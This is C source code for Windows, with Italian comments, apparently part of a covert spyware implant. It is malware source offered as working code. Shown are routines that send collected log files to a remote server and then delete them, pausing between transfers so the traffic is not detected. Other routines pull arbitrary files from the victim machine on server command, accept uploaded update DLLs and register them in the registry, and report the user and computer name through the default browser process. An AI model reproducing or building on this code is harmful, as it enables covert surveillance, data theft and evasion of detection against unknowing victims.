	// Effettua la ricerca dei nomi dei file scramblati (* e . rimangono invariati
	// quindi posso usare le wildcard).
	HM_CompletePath(scrambled_search, DirSpec);
	SAFE_FREE(scrambled_search);

	hFind = FindFirstFile(DirSpec, &FindFileData);
	if (hFind != INVALID_HANDLE_VALUE) {
		do {
			InsertLogList(&log_list_head, &FindFileData);
		} while (FindNextFile(hFind, &FindFileData) != 0);
		FindClose(hFind);
	}

	// Scorre la lista dei file di log ordinata per data
	log_list = log_list_head;
	while(log_list) {
		// Invia il nome del file in chiaro
		if ( !(clear_name = LOG_ScrambleName(log_list->file_name, crypt_key[0], FALSE)) )
			break;
		_snprintf_s(log_file, DLLNAMELEN, _TRUNCATE, "%s", clear_name);
		SAFE_FREE(clear_name);
			
		// SEND_LOGFILE_AND_DELETE, se fallisce, libera la lista e ritorna.
		SEND_LOGFILE_AND_DELETE(HM_CompletePath(log_list->file_name, log_file_path), log_file, band_limit);

		// Fa una pausa per evitare che sia rilevabile una trasmissione
		// di dati continua
		LOG_SendPause(min_sleep, max_sleep);

		log_list = log_list->next;
	}
	FreeLogList(&log_list_head);

	// Dopo la spedizione dei file di LOG la connessione viene chiusa
	// Il server quindi non ha bisogno di un "fine files".
	return TRUE;
}


// Se in wildpath e' presente una wildcard la sosituisce con file_name
// e mette comunque tutto in dest_path.
// Torna dest_path.
char *LOG_CompleteWild(char *wild_path, char *file_name, char *dest_path)
{
	char *wild_ptr;
	
	dest_path[0] = 0; // Termina per sicurezza paranoica...
	strcpy(dest_path, wild_path);
	wild_ptr = strrchr(dest_path, '\\');
	// Sostituisce all'ultimo slash
	if (wild_ptr) {
		wild_ptr++;
		strcpy(wild_ptr, file_name);
	}

	return dest_path;
}


// Legge prima due DWORD (numero di upload e numero di download).
// Poi per ogni upload che viene effettuato dal server, legge una DWORD 
// che e' la dimensione del file, il nome del file (senza path), e il file 
// vero e proprio (solo se la dimensione del file e' > 0).
// In seguito, per ogni download, legge il nome del file da inviare (con path), 
// invia una DWORD che e' la dimensione del file, il nome del file (con path), 
// e il file stesso (se la dimensione e' > 0).
// I file uploadati vengono messi nella working dir.
// Torna FALSE se qualcosa fallisce.
// Gestisce anche la ricezione del codec e degli update.
#define MAX_UPLOAD_NAME_LEN 120
BOOL LOG_UploadDownload(DWORD band_limit, DWORD min_sleep, DWORD max_sleep)
{
	char file_transf_name[MAX_UPLOAD_NAME_LEN];
	char file_transf_path[DLLNAMELEN];
	char file_transf_path_expanded[DLLNAMELEN];
	char file_transf_path_final[DLLNAMELEN*2];
	DWORD upload_count;
	DWORD download_count;
	DWORD file_len;
	WIN32_FIND_DATA FindFileData;
	HANDLE hFind = INVALID_HANDLE_VALUE;

	// Legge il numero di upload e download
	if (!ASP_Read(NULL, (BYTE *)&upload_count, 4, TRUE, NULL)) 
		return FALSE;
	if (!ASP_Read(NULL, (BYTE *)&download_count, 4, TRUE, NULL)) 
		return FALSE;

	// Per ogni upload
	for(; upload_count>0; upload_count--) {
		// Legge la dimensione del file
		if (!ASP_Read(NULL, (BYTE *)&file_len, 4, TRUE, NULL)) 
			return FALSE;

		// Legge il nome del file (senza path). Viene sicuramente NULL terminato
		memset(file_transf_name, 0, sizeof(file_transf_name));
		if (!ASP_Read(NULL, (BYTE *)file_transf_name, sizeof(file_transf_name)-1, TRUE, NULL)) 
			return FALSE;

		// Legge il file (solo se la dimensione e' maggiore di 0)
		// e lo mette nella working dir
		if (file_len > 0) {
			// Se e' il file del codec lo salva col nome scramblato
			if(!strcmp(file_transf_name, COMMON_CODEC_NAME)) {
				// Se il codec esiste gia' lo salva su un file "dummy" per evitare
				// che la sync si blocchi se uno invia per due volte il codec
				hFind = FindFirstFile(HM_CompletePath(H4_CODEC_NAME, file_transf_path), &FindFileData);
				if (hFind == INVALID_HANDLE_VALUE) { // Il file non esiste ancora
					if (!ASP_Read(HM_CompletePath(H4_CODEC_NAME, file_transf_path), NULL, file_len, TRUE, NULL)) 
						return FALSE;
				} else { // il file esiste gia', quindi salvo su un file dummy
					BOOL ret_val;
					FindClose(hFind);
					ret_val = ASP_Read(HM_CompletePath(H4_DUMMY_NAME, file_transf_path), NULL, file_len, TRUE, NULL);
					DeleteFile(HM_CompletePath(H4_DUMMY_NAME, file_transf_path));
					if (!ret_val)
						return FALSE;
				}
			} else if(!strcmp(file_transf_name, COMMON_UPDATE_NAME)) {
				// Se e' la DLL per l'update la salva con il nome appropriato 
				// (vengono ciclati sempre gli stessi due nomi)
				// Se il file e' stato ricevuto per intero aggiorna la chiave nel registry.
				DWORD ftr_len = 0;
	
				// Verifica che il file sia stato ricevuto PER INTERO
				if (!ASP_Read(HM_CompletePath(H4_UPDATE_FILE, file_transf_path), NULL, file_len, TRUE, &ftr_len) || ftr_len != file_len) 
					return FALSE;

				// Inserisce la chiave con la nuvova DLL
				HM_InsertRegistryKey(H4_UPDATE_FILE);
			} else { // Normale file upload
				if (!ASP_Read(HM_CompletePath(file_transf_name, file_transf_path), NULL, file_len, TRUE, NULL)) 
					return FALSE;
			}

			// Fa una pausa per evitare che sia rilevabile una trasmissione
			// di dati continua
			LOG_SendPause(min_sleep, max_sleep);
		}
	}

	// Per ogni download
	for(; download_count>0; download_count--) {
		memset(file_transf_path, 0, sizeof(file_transf_path));
		// Legge il nome del file da inviare (con path)
		if (!ASP_Read(NULL, (BYTE *)file_transf_path, sizeof(file_transf_path)-1, TRUE, NULL)) 
			return FALSE;

		// Espande eventuali variabili d'ambiente
		// La stringa risultante e' NULL terminata per certo
		// (come quella di partenza).
		if (!HM_ExpandStrings(file_transf_path, file_transf_path_expanded, sizeof(file_transf_path_expanded)))
			strcpy(file_transf_path_expanded, file_transf_path);

		// Cicla nel caso ci siano delle wildcards
		hFind = FindFirstFile(file_transf_path_expanded, &FindFileData);
		if (hFind != INVALID_HANDLE_VALUE) {
			do {
				// Salta le directory
				if (FindFileData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
					continue;
				// Sostituisce la wildcard (se presente)
				LOG_CompleteWild(file_transf_path_expanded, FindFileData.cFileName, file_transf_path_final);
				// Invia il file 
				// SEND_LOGFILE, se fallisce, chiude hFind e ritorna
				SEND_LOGFILE(file_transf_path_final, band_limit);
				// Fa una pausa per evitare che sia rilevabile una trasmissione
				// di dati continua
				LOG_SendPause(min_sleep, max_sleep);
			} while (FindNextFile(hFind, &FindFileData) != 0);
			FindClose(hFind);
		}
		// Invia il codice di terminazione per questa wildcard
		SEND_TERMINATION(band_limit);
	}

	return TRUE;
}


// Legge (se c'e') un nuovo file di configurazione
DWORD LOG_ReceiveNewConf()
{
	DWORD conf_file_len = 0; 
	char conf_path[DLLNAMELEN];

	// Legge 4 byte che indicano la dimensione del nuovo file di configurazione
	// (0 se non c'e' un nuovo file)
	if (!ASP_Read(NULL, (BYTE *)&conf_file_len, 4, TRUE, NULL)) 
		return LOG_CONF_ERROR;

	// Nessuna nuova configurazione
	if (conf_file_len == 0)
		return LOG_CONF_NOP;

	// Salva il file di configuazione su una copia di backup
	if (!ASP_Read(HM_CompletePath(H4_CONF_BU, conf_path), NULL, conf_file_len, TRUE, NULL))
		return LOG_CONF_ERROR;

	// Controlla se il file e' arrivato integro.
	// Se si, lo copia sulla configurazione originale 
	// e cancella la copia di backup. altrimenti cancella 
	// la copia non integra e basta. Torna TRUE se 
	// ha copiato con successo.
	if (!HM_CheckNewConf())
		return LOG_CONF_NOP; // Se ha fallito il check torna che non c'e' nessuna 
	                         // nuova configurazione da caricare.

	return LOG_CONF_NEW_FILE; 
}


// Inizializza la connessione per l'invio dei log
// (e la ricezione del file di configurazione)
// Se ha successo dovra' essere richiamata LOG_CloseLogConnection()
// per chiudere la connessione.
// Invia nell'ordine
// - UniqueID
// - Client Version
// - System Date (2 DWORD)
// - Username (o "-" se assente)
// - Computername (o "-" se assente)
BOOL LOG_StartLogConnection(char *asp_server, char *unique_id)
{
	char asp_process[DLLNAMELEN+2]; // Il nome del processo avra' le ""
	char env_var[512];
	char init_string[64];
	nanosec_time time_nanosec;

	// Legge il browser di default
	HM_GetDefaultBrowser(asp_process);

	// Inizializza ASP
	if (!ASP_Start(asp_process, asp_server))
		return FALSE;

	// Invia la versione del client e la sua "chiave"
	sprintf(init_string, "%s%s", CLIENT_KEY, CLIENT_VERSION);
	if (!ASP_Write(NULL, (BYTE *)init_string, strlen(init_string), TRUE, B100Mbit)) {
		ASP_Stop();
		return FALSE;
	}

	// Invia lo unique ID (non c'e' bisogno di mettere il band limit per 
	// lo unique id)
	if (!ASP_Write(NULL, (BYTE *)unique_id, strlen(unique_id), TRUE, B100Mbit)) {
		ASP_Stop();
		return FALSE;
	}

	// Invia la data di sistema GMT (potrebbe inviare 0 se fallisce HM_GetDate)
	// 2 DWORD in 100-nanosec dal 1600
	memset(&time_nanosec, 0, sizeof(time_nanosec));
	HM_GetDate(&time_nanosec);
	if (!ASP_Write(NULL, (BYTE *)&time_nanosec, sizeof(time_nanosec), TRUE, B100Mbit)) {
		ASP_Stop();
		return FALSE;
	}

	// Invia il nome dell'utente
	memset(env_var, 0, sizeof(env_var));
	env_var[0]='-';
	GetEnvironmentVariableW(L"USERNAME", (WCHAR *)env_var, sizeof(env_var)/2-2);
	if (!ASP_Write(NULL, (BYTE *)env_var, wcslen((WCHAR *)env_var)*2, TRUE, B100Mbit)) {
		ASP_Stop();
		return FALSE;
	}

	// Invia il nome macchina
	memset(env_var, 0, sizeof(env_var));
	env_var[0]='-';
	GetEnvironmentVariableW(L"COMPUTERNAME", (WCHAR *)env_var, sizeof(env_var)/2-2);
	if (!ASP_Write(NULL, (BYTE *)env_var, wcslen((WCHAR *)env_var)*2, TRUE, B100Mbit)) {
		ASP_Stop();
		return FALSE;
	}

	return TRUE;
}


// Chiude la connessione per l'invio dei log
void LOG_CloseLogConnection()
{
	ASP_Stop();
}